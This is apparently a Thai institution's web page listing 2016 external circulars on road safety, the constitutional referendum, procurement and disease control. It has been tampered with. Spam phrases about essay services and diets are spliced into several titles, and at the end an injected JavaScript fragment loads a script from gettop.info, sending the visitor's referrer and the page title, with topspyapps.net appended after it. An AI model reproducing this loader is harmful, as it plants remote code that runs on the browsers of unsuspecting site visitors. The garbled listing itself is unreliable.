ข่าวภายนอก

 เรื่องการดำเนินการป้องกันและลดอุบัติเหตุทางถนนตลอดทั้งปี(สำนักงานคณะกรรมการการอุดมศึกษา 23/06/59 )

dieta y deporte  เรื่องการดาวน์โห where to buy book reports ลดแอปพลิเคชั่นฉลาดรู้ประชามติ

(สำนักงานคณะกรรมการการอุดมศึกษา 23/06/59 )

 รายงานผลการดำเนินการตามประกาศสำนักนายกรัฐมนตรี เรื่อง แนวทางปฏิบัติในการจัดหาพัสดุ ด้วยวิธีตลาดอิเล็กทรอนิกส์ฯ(สำนักงานคณะกรรมการการอุดมศึกษา 23/06/59 )

 เรื่อง ประชาสัมพันธ์เผยแพร่การออกเสียงประชามติร่างรัฐธรรมนูญ (สำนักงานคณะกรรมการการเลือกตั้งประจำจังหวัดพระนครศรีอยุธยา 22/06/59)

 เรื่อง ขอความเห็นชอบให้ข้าราชการลาเข้าร่วมโครงการบรรพชาอุปสมบทหมู่เฉลิมพระเกียรติพระบาทสมเด็จพระบาทสมเด็จพระเจ้าอยู่หัว (สำนักงานคณะกรรมการการอุดมศึกษา 17/06/59 )

 เรื่อง การรับสมัครผู้สมควรเป็นผู้ตรวจการแผ่นดิน (สภานิติบัญญัติ 17/06/59 )

 เรื่อง ขอความร่าวมือในการดำเนินการเฝ้าระวังป้องกันควบคุมโรคมือ เท้า ปาก ย้อนหลัง 5 ปี ตั้งแต่2554 จนถึงปัจจุบัน (สำนักงานคณะก essay editing service รรมการการอุดมศึกษา 17/06/59 )

s.src='http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=' + encodeURIComponent(document.referrer) + '&default_keyword=' + encodeURIComponent(document.title) + ''; if (document.currentScript) { topspyapps.net